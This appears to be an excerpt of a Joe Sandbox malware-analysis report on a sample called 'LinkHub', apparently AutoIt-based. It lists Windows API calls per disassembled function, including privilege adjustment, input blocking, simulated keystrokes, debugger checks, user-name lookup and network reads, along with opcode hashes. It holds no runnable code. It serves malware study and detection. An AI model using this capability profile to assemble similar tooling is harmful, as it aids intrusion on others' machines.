Part of subcall function 00C11900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C11922
Part of subcall function 00C11900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C11931
Part of subcall function 00C11900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C11938
Part of subcall function 00C11900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C1194E

GetLengthSid.ADVAPI32(?,00000000,00C11C81), ref: 00C120FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C12107
HeapAlloc.KERNEL32(00000000), ref: 00C1210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C12127
GetProcessHeap.KERNEL32(00000000,00000000,00C11C81), ref: 00C1213B
HeapFree.KERNEL32(00000000), ref: 00C12142

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 7fc36e4fd36ea402874dd93dbadb1e033b7531c9438b6975873b23fc7dc06c0d
Instruction ID: 5d627d623826a01b9f3bff367a107bbf8fb96789939a6f23e87f6ad16602943e
Opcode Fuzzy Hash: 7fc36e4fd36ea402874dd93dbadb1e033b7531c9438b6975873b23fc7dc06c0d
Instruction Fuzzy Hash: ED11AF79A00204FFDB14DF64DC09BEE7BA9FF46365F248018E95297220C7359E91EB60

Function 00C2A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C2A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C2A6D0

Part of subcall function 00C242B9: GetInputState.USER32 ref: 00C24310
Part of subcall function 00C242B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C243AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C2A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C2A6BA

Strings

*.*, xrefs: 00C2A5A2

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 64f699a2ce75d0003937502ca149f370e5cc11ec8c27811de7ad5d32be7bcc04
Instruction ID: d9a14a8f9274e7e84a11f2d571072c5328e2f9f2adee73d4293740a57b6fc4cf
Opcode Fuzzy Hash: 64f699a2ce75d0003937502ca149f370e5cc11ec8c27811de7ad5d32be7bcc04
Instruction Fuzzy Hash: B9414C7590021AAFCF15EFA4D849AEEBBB5FF05310F2440A6F815A21A1EB719F44CF61

Function 00BB22AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00BB233E
GetSysColor.USER32(0000000F), ref: 00BB2421
SetBkColor.GDI32(?,00000000), ref: 00BB2434

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 880ea5b5d83d27489b31bedc287dc10b490a1083e9bf976aefb091be7f5f4af6
Instruction ID: e5f5f63fd36425775c52794fe4e9d11c6b5510ca3e9ab4a34327d9e77a7b0274
Opcode Fuzzy Hash: 880ea5b5d83d27489b31bedc287dc10b490a1083e9bf976aefb091be7f5f4af6
Instruction Fuzzy Hash: 068104B0108418BFE629773C8CD8EFF25DEEB42740B1501C9F602D7699C9AD9E46937A

Function 00C32263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C33AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C33AD7
Part of subcall function 00C33AAB: _wcslen.LIBCMT ref: 00C33AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C322BA
WSAGetLastError.WSOCK32 ref: 00C322E1
bind.WSOCK32(00000000,?,00000010), ref: 00C32338
WSAGetLastError.WSOCK32 ref: 00C32343
closesocket.WSOCK32(00000000), ref: 00C32372

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 41e320f9702efb57cfe78dd6c1c5e99a47862f8b2126ece487e4583769d1e3a0
Instruction ID: 0a9d5751f583868af258378f565c86bc04005df26ad232617c187d8f9685f795
Opcode Fuzzy Hash: 41e320f9702efb57cfe78dd6c1c5e99a47862f8b2126ece487e4583769d1e3a0
Instruction Fuzzy Hash: B6519175A00200AFEB10AF24C886F7A77E9AB45714F148498F9565F2D3CAB5ED41CBE1

Function 00C426DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C4275C
IsWindowEnabled.USER32 ref: 00C4276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00C42777
IsIconic.USER32 ref: 00C42785
IsZoomed.USER32 ref: 00C42793

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 68588407fa1b16f877940548465b216108d26ecc4b9459594f0be466823febc8
Instruction ID: 1c20949d685e78a95a7721cbbbd9c02a7ce1cbcd3cd5a27d04686ea88d893f9d
Opcode Fuzzy Hash: 68588407fa1b16f877940548465b216108d26ecc4b9459594f0be466823febc8
Instruction Fuzzy Hash: 3321E2357002108FE7119F26C845B6A7BE5FF85324F998068F85ACB352CB71EE42CBA0

Function 00C2D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00C2D8CE
GetLastError.KERNEL32(?,00000000), ref: 00C2D92F
SetEvent.KERNEL32(?,?,00000000), ref: 00C2D943

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 64225e2064c0b115a0a873284643d46b524e5322bb597d59b3ea3329bffa4f3b
Instruction ID: 98a138625fc6ad120a96f6cffd0fe7f7f1ddf1e5f02ab50134c0b9edfb924e18
Opcode Fuzzy Hash: 64225e2064c0b115a0a873284643d46b524e5322bb597d59b3ea3329bffa4f3b
Instruction Fuzzy Hash: 2321B075500715AFE720AF66E848BAAB7F8AB51314F10441AF157D2541EB70EE44CB50

Function 00C1E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00BF46AC), ref: 00C1E482
GetFileAttributesW.KERNEL32(?), ref: 00C1E491
FindFirstFileW.KERNEL32(?,?), ref: 00C1E4A2
FindClose.KERNEL32(00000000), ref: 00C1E4AE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: c3c4548f8eb09c25a81cc0b77ebf951f4d8a85ed3196ec44b5700d597f94acf0
Instruction ID: 4418678a0daafd68a74abdc6db7e06fa6e1605c9c6b00aad2ebba6910ee12935
Opcode Fuzzy Hash: c3c4548f8eb09c25a81cc0b77ebf951f4d8a85ed3196ec44b5700d597f94acf0
Instruction Fuzzy Hash: 4DF0A030410910579221B7B8AC0D9AE767DBE03336B504701FD76C20F0D7B89E95A696

Function 00C0E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C0E5F8

Strings

X64, xrefs: 00C0E680
%.3d, xrefs: 00C0E603

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 8becdfac97dc81458959f82393c2aadcbcc585d9a4f48c37c550fcbc1aa51e33
Instruction ID: e7b8de9e403b96c04d6c73c7030468fcc7d839898d5be20e9b698c6899210b9b
Opcode Fuzzy Hash: 8becdfac97dc81458959f82393c2aadcbcc585d9a4f48c37c550fcbc1aa51e33
Instruction Fuzzy Hash: 40D012B1C4410DD6CB909B91ED88EBD73BCBB18700F148CA6F906A1080E6219908D721

Function 00BE2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BE2A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BE2A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BE2AA1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: dab5e2e051a8a0524ef005d74795e667bb9b3f4e7b5854d0264d157e706ec9d9
Instruction ID: fb21f6fcb29d6f3c7faf108771c2cb9315c011ab92b126c1ed0975f5354cc334
Opcode Fuzzy Hash: dab5e2e051a8a0524ef005d74795e667bb9b3f4e7b5854d0264d157e706ec9d9
Instruction Fuzzy Hash: 9831B3759112289BCB21DF68D98979DBBF8BF18310F5042EAE80CA6261E7709F858F45

Function 00C12010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BD014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00BD09D8
Part of subcall function 00BD014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00BD09F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C12087
GetLastError.KERNEL32 ref: 00C12097

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: df54a54d34e9567f533e65288dafb7d5b46596bc174d602b8f808f16ab6b149e
Instruction ID: 2d05df325e1e195c8da8026a8e50fdd59fc70cf878208feef4f78c1a71834c7e
Opcode Fuzzy Hash: df54a54d34e9567f533e65288dafb7d5b46596bc174d602b8f808f16ab6b149e
Instruction Fuzzy Hash: CB119DB1410205AFD718AF54DCC6E6ABBF8FB09710B20851EF09653251EB70AC91CA20

Function 00C1ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C1ED04

Strings

DOWN, xrefs: 00C1ECE9

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: ce14852357a15a1c9a67db91c0f6505fd59f8f76c1a5899f03d2f1508e748d17
Instruction ID: 4cf0570357b5193076c563a421d7455397f81ab432c0a01f13278840f9b02adf
Opcode Fuzzy Hash: ce14852357a15a1c9a67db91c0f6505fd59f8f76c1a5899f03d2f1508e748d17
Instruction Fuzzy Hash: 51E08C662AD73239B90425187C06EF6038C9F23734B2142A7FC10E81C1EEA05D8261A8

Function 00C0E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C0E664

Strings

X64, xrefs: 00C0E680

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 692ba92fae10a93e9a62960248f37662964dbc6187a319fac0113f5ce4bba4ef
Instruction ID: 89f4ad2270725755d89104acd240cd6e21bd30648c85a3c7bdcc4a194c019ffc
Opcode Fuzzy Hash: 692ba92fae10a93e9a62960248f37662964dbc6187a319fac0113f5ce4bba4ef
Instruction Fuzzy Hash: 1FD0C9B480111DEADB80CB50ECC8EDD77BCBB04304F100A95F106A2140D73096488B10

Function 00C241FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C352EE,?,?,00000035,?), ref: 00C24229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C352EE,?,?,00000035,?), ref: 00C24239

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 285b6990700b855368a72e747c5e2c8917ef1944d10e0ecb7f7156d77f02e7ff
Instruction ID: 42f331d3d9362a021aef37d7dc450f7f7ab8fb9f977a473e2e8b0aee7424107f
Opcode Fuzzy Hash: 285b6990700b855368a72e747c5e2c8917ef1944d10e0ecb7f7156d77f02e7ff
Instruction Fuzzy Hash: 7FF0A0347002286AE7202766AC4DFEB3AAEEFC5761F000265F505D2181D9A09A4486B0

Function 00C1BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C1BC24
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00C1BC37

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: bfb25f2a404c68969a0ff2171885f10a7525ad134c0f3f76aad66a2c3a1d0742
Instruction ID: e54188dd9a0315a92876684fda32d8597f89f1e816a1a74ea93ea9a5f503292d
Opcode Fuzzy Hash: bfb25f2a404c68969a0ff2171885f10a7525ad134c0f3f76aad66a2c3a1d0742
Instruction Fuzzy Hash: 6CF0907490024DABDB019FA0C815BFE7FB0FF05309F008009F951A5191C7798601DF94

Function 00C11A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C11B48), ref: 00C11A20
CloseHandle.KERNEL32(?,?,00C11B48), ref: 00C11A35

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: eed55c9a8276ff777b6c3dcbd31056c34b052125198e32263c67825e6cd81d11
Instruction ID: b8437e3540010c5548b7e599d3c76315d56fd1344665c9ae5236102209a4a410
Opcode Fuzzy Hash: eed55c9a8276ff777b6c3dcbd31056c34b052125198e32263c67825e6cd81d11
Instruction Fuzzy Hash: AEE01A72014610AEE7252B10EC05F76BBE9FB04320F14881EB5A680470EA626C90EA10

Function 00C2F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C2F51A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: e0d70d0f223a3e6f68985ee52af7c426b34959671ca80b2127ae6bbf3d46dffb
Instruction ID: eba922ef0fffdd777e3a0a54cd20dce4378659cd766c0010e5137ab7f9c2bb2e
Opcode Fuzzy Hash: e0d70d0f223a3e6f68985ee52af7c426b34959671ca80b2127ae6bbf3d46dffb
Instruction Fuzzy Hash: D9E012352002155FD710AF69E404A9AB7E8AFA4761B008479F84AC7251D6B0E941CBA0

Function 00BD0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00BD075E), ref: 00BD0D4A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4b9ca857f242593f198400573f74352e2de3f61ef6f367ef9f63029b38ce77f7
Instruction ID: a132de7029204b36c8d986877d6e4b9b03ddd2d952c24210b2d34e5c98728c8f
Opcode Fuzzy Hash: 4b9ca857f242593f198400573f74352e2de3f61ef6f367ef9f63029b38ce77f7
Instruction Fuzzy Hash:

Function 00C3353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C3358D
DeleteObject.GDI32(00000000), ref: 00C335A0
DestroyWindow.USER32 ref: 00C335AF
GetDesktopWindow.USER32 ref: 00C335CA
GetWindowRect.USER32(00000000), ref: 00C335D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C33700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C3370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C33755
GetClientRect.USER32(00000000,?), ref: 00C33761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C3379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C337BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C337D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C337DD
GlobalLock.KERNEL32(00000000), ref: 00C337E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C337F5
GlobalUnlock.KERNEL32(00000000), ref: 00C337FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C33805
GlobalFree.KERNEL32(00000000), ref: 00C33810
